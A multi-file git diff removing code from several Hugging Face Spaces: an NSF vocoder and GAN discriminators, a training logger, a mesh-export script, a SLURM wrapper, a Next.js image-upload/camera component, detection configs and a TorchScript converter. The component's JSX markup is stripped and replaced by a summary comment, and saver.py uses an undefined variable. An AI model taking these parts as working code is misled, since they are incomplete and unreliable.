- x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is 
used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen 
= SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMsNSFsidM(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - 
gin_channels, - sr, - version, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - if version == "v1": - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - else: - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - self.speaker_map = None - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def construct_spkmixmap(self, n_speaker): - self.speaker_map = torch.zeros((n_speaker, 1, 1, self.gin_channels)) - for i in range(n_speaker): - self.speaker_map[i] = self.emb_g(torch.LongTensor([[i]])) - self.speaker_map = self.speaker_map.unsqueeze(0) - - def forward(self, phone, phone_lengths, pitch, nsff0, g, rnd, max_len=None): - if self.speaker_map is not None: # [N, S] * [S, B, 1, H] - g = g.reshape((g.shape[0], g.shape[1], 1, 1, 1)) # [N, S, B, 1, 1] - g = g * self.speaker_map # [N, S, B, 1, H] - g = torch.sum(g, dim=1) # [N, 1, B, 1, H] - g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N] - else: - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * rnd) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # 
print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/FrankZxShen/so-vits-svc-models-pcr/diffusion/logger/saver.py b/spaces/FrankZxShen/so-vits-svc-models-pcr/diffusion/logger/saver.py deleted file mode 
100644 index ef78b52b6bcd32106f962b731d3784d72d5f0cce..0000000000000000000000000000000000000000 --- a/spaces/FrankZxShen/so-vits-svc-models-pcr/diffusion/logger/saver.py +++ /dev/null @@ -1,150 +0,0 @@ -''' -author: wayn391@mastertones -''' - -import os -import json -import time -import yaml -import datetime -import torch -import matplotlib.pyplot as plt -from . import utils -from torch.utils.tensorboard import SummaryWriter - -class Saver(object): - def __init__( - self, - args, - initial_global_step=-1): - - self.expdir = args.env.expdir - self.sample_rate = args.data.sampling_rate - - # cold start - self.global_step = initial_global_step - self.init_time = time.time() - self.last_time = time.time() - - # makedirs - os.makedirs(self.expdir, exist_ok=True) - - # path - self.path_log_info = os.path.join(self.expdir, 'log_info.txt') - - # ckpt - os.makedirs(self.expdir, exist_ok=True) - - # writer - self.writer = SummaryWriter(os.path.join(self.expdir, 'logs')) - - # save config - path_config = os.path.join(self.expdir, 'config.yaml') - with open(path_config, "w") as out_config: - yaml.dump(dict(args), out_config) - - - def log_info(self, msg): - '''log method''' - if isinstance(msg, dict): - msg_list = [] - for k, v in msg.items(): - tmp_str = '' - if isinstance(v, int): - tmp_str = '{}: {:,}'.format(k, v) - else: - tmp_str = '{}: {}'.format(k, v) - - msg_list.append(tmp_str) - msg_str = '\n'.join(msg_list) - else: - msg_str = msg - - # dsplay - print(msg_str) - - # save - with open(self.path_log_info, 'a') as fp: - fp.write(msg_str+'\n') - - def log_value(self, dict): - for k, v in dict.items(): - self.writer.add_scalar(k, v, self.global_step) - - def log_spec(self, name, spec, spec_out, vmin=-14, vmax=3.5): - spec_cat = torch.cat([(spec_out - spec).abs() + vmin, spec, spec_out], -1) - spec = spec_cat[0] - if isinstance(spec, torch.Tensor): - spec = spec.cpu().numpy() - fig = plt.figure(figsize=(12, 9)) - plt.pcolor(spec.T, vmin=vmin, vmax=vmax) - plt.tight_layout() - self.writer.add_figure(name, fig, self.global_step) - - def log_audio(self, dict): - for k, v in dict.items(): - self.writer.add_audio(k, v, global_step=self.global_step, sample_rate=self.sample_rate) - - def get_interval_time(self, update=True): - cur_time = time.time() - time_interval = cur_time - self.last_time - if update: - self.last_time = cur_time - return time_interval - - def get_total_time(self, to_str=True): - total_time = time.time() - self.init_time - if to_str: - total_time = str(datetime.timedelta( - seconds=total_time))[:-5] - return total_time - - def save_model( - self, - model, - optimizer, - name='model', - postfix='', - to_json=False): - # path - if postfix: - postfix = '_' + postfix - path_pt = os.path.join( - self.expdir , name+postfix+'.pt') - - # check - print(' [*] model checkpoint saved: {}'.format(path_pt)) - - # save - if optimizer is not None: - torch.save({ - 'global_step': self.global_step, - 'model': model.state_dict(), - 'optimizer': optimizer.state_dict()}, path_pt) - else: - torch.save({ - 'global_step': self.global_step, - 'model': model.state_dict()}, path_pt) - - # to json - if to_json: - path_json = os.path.join( - self.expdir , name+'.json') - utils.to_json(path_params, path_json) - - def delete_model(self, name='model', postfix=''): - # path - if postfix: - postfix = '_' + postfix - path_pt = os.path.join( - self.expdir , name+postfix+'.pt') - - # delete - if os.path.exists(path_pt): - os.remove(path_pt) - print(' [*] model checkpoint deleted: {}'.format(path_pt)) - - def 
global_step_increment(self): - self.global_step += 1 - - diff --git a/spaces/Gen-Sim/Gen-Sim/misc/generate_primitive_mesh.py b/spaces/Gen-Sim/Gen-Sim/misc/generate_primitive_mesh.py deleted file mode 100644 index 3032679b8ef6192ac25c24528bf4f98ea2c2a2bd..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/misc/generate_primitive_mesh.py +++ /dev/null @@ -1,15 +0,0 @@ -import numpy as np -import trimesh - -# generate unit length mesh to replace primitives - -box = trimesh.creation.box(extents=[1, 1, 1]) -trimesh.exchange.export.export_mesh(box, "box.obj") - - -cylinder = trimesh.creation.cylinder(radius=1, height=1) -trimesh.exchange.export.export_mesh(cylinder, "cylinder.obj") - - -sphere = trimesh.creation.icosphere() -trimesh.exchange.export.export_mesh(sphere, "sphere.obj") diff --git a/spaces/Gen-Sim/Gen-Sim/scripts/supercloud/run_job_script.sh b/spaces/Gen-Sim/Gen-Sim/scripts/supercloud/run_job_script.sh deleted file mode 100644 index 0c66194297d55f1130ea0fb9ff487790591d3262..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/scripts/supercloud/run_job_script.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash -#SBATCH -c 10 -#SBATCH -n 1 -#SBATCH -o logs/%j.out -#SBATCH --exclusive - -eval $CMD \ No newline at end of file diff --git a/spaces/GeorgeOrville/bingo/src/components/chat-image.tsx b/spaces/GeorgeOrville/bingo/src/components/chat-image.tsx deleted file mode 100644 index 05ecc9771eada27a0f2d160bb01cba170d37bb09..0000000000000000000000000000000000000000 --- a/spaces/GeorgeOrville/bingo/src/components/chat-image.tsx +++ /dev/null @@ -1,170 +0,0 @@ -import { - useEffect, - useState, - useCallback, - ChangeEvent, - ClipboardEvent, - MouseEventHandler, - FormEvent, - useRef -} from "react" -import Image from 'next/image' -import PasteIcon from '@/assets/images/paste.svg' -import UploadIcon from '@/assets/images/upload.svg' -import CameraIcon from '@/assets/images/camera.svg' -import { useBing } from '@/lib/hooks/use-bing' -import { cn } from '@/lib/utils' - -interface ChatImageProps extends Pick, 'uploadImage'> {} - -const preventDefault: MouseEventHandler = (event) => { - event.nativeEvent.stopImmediatePropagation() -} - -const toBase64 = (file: File): Promise => new Promise((resolve, reject) => { - const reader = new FileReader() - reader.readAsDataURL(file) - reader.onload = () => resolve(reader.result as string) - reader.onerror = reject -}) - -export function ChatImage({ children, uploadImage }: React.PropsWithChildren) { - const videoRef = useRef(null) - const canvasRef = useRef(null) - const mediaStream = useRef() - const [panel, setPanel] = useState('none') - - const upload = useCallback((url: string) => { - if (url) { - uploadImage(url) - } - setPanel('none') - }, [panel]) - - const onUpload = useCallback(async (event: ChangeEvent) => { - const file = event.target.files?.[0] - if (file) { - const fileDataUrl = await toBase64(file) - if (fileDataUrl) { - upload(fileDataUrl) - } - } - }, []) - - const onPaste = useCallback((event: ClipboardEvent) => { - const pasteUrl = event.clipboardData.getData('text') ?? 
'' - upload(pasteUrl) - }, []) - - const onEnter = useCallback((event: FormEvent) => { - event.preventDefault() - event.stopPropagation() - // @ts-ignore - const inputUrl = event.target.elements.image.value - if (inputUrl) { - upload(inputUrl) - } - }, []) - - const openVideo: MouseEventHandler = async (event) => { - event.stopPropagation() - setPanel('camera-mode') - } - - const onCapture = () => { - if (canvasRef.current && videoRef.current) { - const canvas = canvasRef.current - canvas.width = videoRef.current!.videoWidth - canvas.height = videoRef.current!.videoHeight - canvas.getContext('2d')?.drawImage(videoRef.current, 0, 0, canvas.width, canvas.height) - const cameraUrl = canvas.toDataURL('image/jpeg') - upload(cameraUrl) - } - } - - useEffect(() => { - const handleBlur = () => { - if (panel !== 'none') { - setPanel('none') - } - } - document.addEventListener('click', handleBlur) - return () => { - document.removeEventListener('click', handleBlur) - } - }, [panel]) - - useEffect(() => { - if (panel === 'camera-mode') { - navigator.mediaDevices.getUserMedia({ video: true, audio: false }) - .then(videoStream => { - mediaStream.current = videoStream - if (videoRef.current) { - videoRef.current.srcObject = videoStream - } - }) - } else { - if (mediaStream.current) { - mediaStream.current.getTracks().forEach(function(track) { - track.stop() - }) - mediaStream.current = undefined - } - } - }, [panel]) - - return ( -
      {/* The JSX markup of this render block did not survive extraction: its tags were
          stripped, leaving only fragments. What remains indicates a trigger element that
          toggles the panel ("添加图像" / "Add image"), a paste-URL form wired to onPaste and
          onEnter, a file-upload input wired to onUpload, a camera button wired to openVideo,
          and a camera-mode view whose video/canvas elements feed onCapture. */}
      - ) -} diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/dcn/mask_rcnn_r50_fpn_dconv_c3-c5_1x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/dcn/mask_rcnn_r50_fpn_dconv_c3-c5_1x_coco.py deleted file mode 100644 index ababe58dc3fdfbbc6c366f48271db31bf6e2e9e2..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/dcn/mask_rcnn_r50_fpn_dconv_c3-c5_1x_coco.py +++ /dev/null @@ -1,5 +0,0 @@ -_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py' -model = dict( - backbone=dict( - dcn=dict(type='DCN', deform_groups=1, fallback_on_stride=False), - stage_with_dcn=(False, True, True, True))) diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_fpn_iou_1x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_fpn_iou_1x_coco.py deleted file mode 100644 index ddf663e4f0e1525490a493674b32b3dc4c781bb2..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_fpn_iou_1x_coco.py +++ /dev/null @@ -1,6 +0,0 @@ -_base_ = './faster_rcnn_r50_fpn_1x_coco.py' -model = dict( - roi_head=dict( - bbox_head=dict( - reg_decoded_bbox=True, - loss_bbox=dict(type='IoULoss', loss_weight=10.0)))) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r101-d8_769x769_80k_cityscapes.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r101-d8_769x769_80k_cityscapes.py deleted file mode 100644 index 70f9b31966128e8d9ec37859f57a7edfd8e6d1b2..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r101-d8_769x769_80k_cityscapes.py +++ /dev/null @@ -1,2 +0,0 @@ -_base_ = './danet_r50-d8_769x769_80k_cityscapes.py' -model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101)) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/tools/pytorch2torchscript.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/tools/pytorch2torchscript.py deleted file mode 100644 index 206c4bb457ece3901fbd536db1c666290f217aa4..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/tools/pytorch2torchscript.py +++ /dev/null @@ -1,184 +0,0 @@ -import argparse - -import mmcv -import numpy as np -import torch -import torch._C -import torch.serialization -from mmcv.runner import load_checkpoint -from torch import nn - -from mmseg.models import build_segmentor - -torch.manual_seed(3) - - -def digit_version(version_str): - digit_version = [] - for x in version_str.split('.'): - if x.isdigit(): - digit_version.append(int(x)) - elif x.find('rc') != -1: - patch_version = x.split('rc') - digit_version.append(int(patch_version[0]) - 1) - digit_version.append(int(patch_version[1])) - return digit_version - - -def check_torch_version(): - torch_minimum_version = '1.8.0' - torch_version = digit_version(torch.__version__) - - assert (torch_version >= digit_version(torch_minimum_version)), \ - f'Torch=={torch.__version__} is not support for converting to ' \ - f'torchscript. Please install pytorch>={torch_minimum_version}.' 
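# Illustrative sketch (not from the original file): how digit_version() above parses
# version strings, including release-candidate suffixes:
#   digit_version("1.8.0")    -> [1, 8, 0]
#   digit_version("1.9.0rc1") -> [1, 9, -1, 1]   # rc builds compare below the final release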
- - -def _convert_batchnorm(module): - module_output = module - if isinstance(module, torch.nn.SyncBatchNorm): - module_output = torch.nn.BatchNorm2d(module.num_features, module.eps, - module.momentum, module.affine, - module.track_running_stats) - if module.affine: - module_output.weight.data = module.weight.data.clone().detach() - module_output.bias.data = module.bias.data.clone().detach() - # keep requires_grad unchanged - module_output.weight.requires_grad = module.weight.requires_grad - module_output.bias.requires_grad = module.bias.requires_grad - module_output.running_mean = module.running_mean - module_output.running_var = module.running_var - module_output.num_batches_tracked = module.num_batches_tracked - for name, child in module.named_children(): - module_output.add_module(name, _convert_batchnorm(child)) - del module - return module_output - - -def _demo_mm_inputs(input_shape, num_classes): - """Create a superset of inputs needed to run test or train batches. - - Args: - input_shape (tuple): - input batch dimensions - num_classes (int): - number of semantic classes - """ - (N, C, H, W) = input_shape - rng = np.random.RandomState(0) - imgs = rng.rand(*input_shape) - segs = rng.randint( - low=0, high=num_classes - 1, size=(N, 1, H, W)).astype(np.uint8) - img_metas = [{ - 'img_shape': (H, W, C), - 'ori_shape': (H, W, C), - 'pad_shape': (H, W, C), - 'filename': '.png', - 'scale_factor': 1.0, - 'flip': False, - } for _ in range(N)] - mm_inputs = { - 'imgs': torch.FloatTensor(imgs).requires_grad_(True), - 'img_metas': img_metas, - 'gt_semantic_seg': torch.LongTensor(segs) - } - return mm_inputs - - -def pytorch2libtorch(model, - input_shape, - show=False, - output_file='tmp.pt', - verify=False): - """Export Pytorch model to TorchScript model and verify the outputs are - same between Pytorch and TorchScript. - - Args: - model (nn.Module): Pytorch model we want to export. - input_shape (tuple): Use this input shape to construct - the corresponding dummy input and execute the model. - show (bool): Whether print the computation graph. Default: False. - output_file (string): The path to where we store the - output TorchScript model. Default: `tmp.pt`. - verify (bool): Whether compare the outputs between - Pytorch and TorchScript. Default: False. 
- """ - if isinstance(model.decode_head, nn.ModuleList): - num_classes = model.decode_head[-1].num_classes - else: - num_classes = model.decode_head.num_classes - - mm_inputs = _demo_mm_inputs(input_shape, num_classes) - - imgs = mm_inputs.pop('imgs') - - # replace the orginal forword with forward_dummy - model.forward = model.forward_dummy - model.eval() - traced_model = torch.jit.trace( - model, - example_inputs=imgs, - check_trace=verify, - ) - - if show: - print(traced_model.graph) - - traced_model.save(output_file) - print('Successfully exported TorchScript model: {}'.format(output_file)) - - -def parse_args(): - parser = argparse.ArgumentParser( - description='Convert MMSeg to TorchScript') - parser.add_argument('config', help='test config file path') - parser.add_argument('--checkpoint', help='checkpoint file', default=None) - parser.add_argument( - '--show', action='store_true', help='show TorchScript graph') - parser.add_argument( - '--verify', action='store_true', help='verify the TorchScript model') - parser.add_argument('--output-file', type=str, default='tmp.pt') - parser.add_argument( - '--shape', - type=int, - nargs='+', - default=[512, 512], - help='input image size (height, width)') - args = parser.parse_args() - return args - - -if __name__ == '__main__': - args = parse_args() - check_torch_version() - - if len(args.shape) == 1: - input_shape = (1, 3, args.shape[0], args.shape[0]) - elif len(args.shape) == 2: - input_shape = ( - 1, - 3, - ) + tuple(args.shape) - else: - raise ValueError('invalid input shape') - - cfg = mmcv.Config.fromfile(args.config) - cfg.model.pretrained = None - - # build the model and load checkpoint - cfg.model.train_cfg = None - segmentor = build_segmentor( - cfg.model, train_cfg=None, test_cfg=cfg.get('test_cfg')) - # convert SyncBN to BN - segmentor = _convert_batchnorm(segmentor) - - if args.checkpoint: - load_checkpoint(segmentor, args.checkpoint, map_location='cpu') - - # convert the PyTorch model to LibTorch model - pytorch2libtorch( - segmentor, - input_shape, - show=args.show, - output_file=args.output_file, - verify=args.verify) diff --git a/spaces/Groq/mlagility/graphs.py 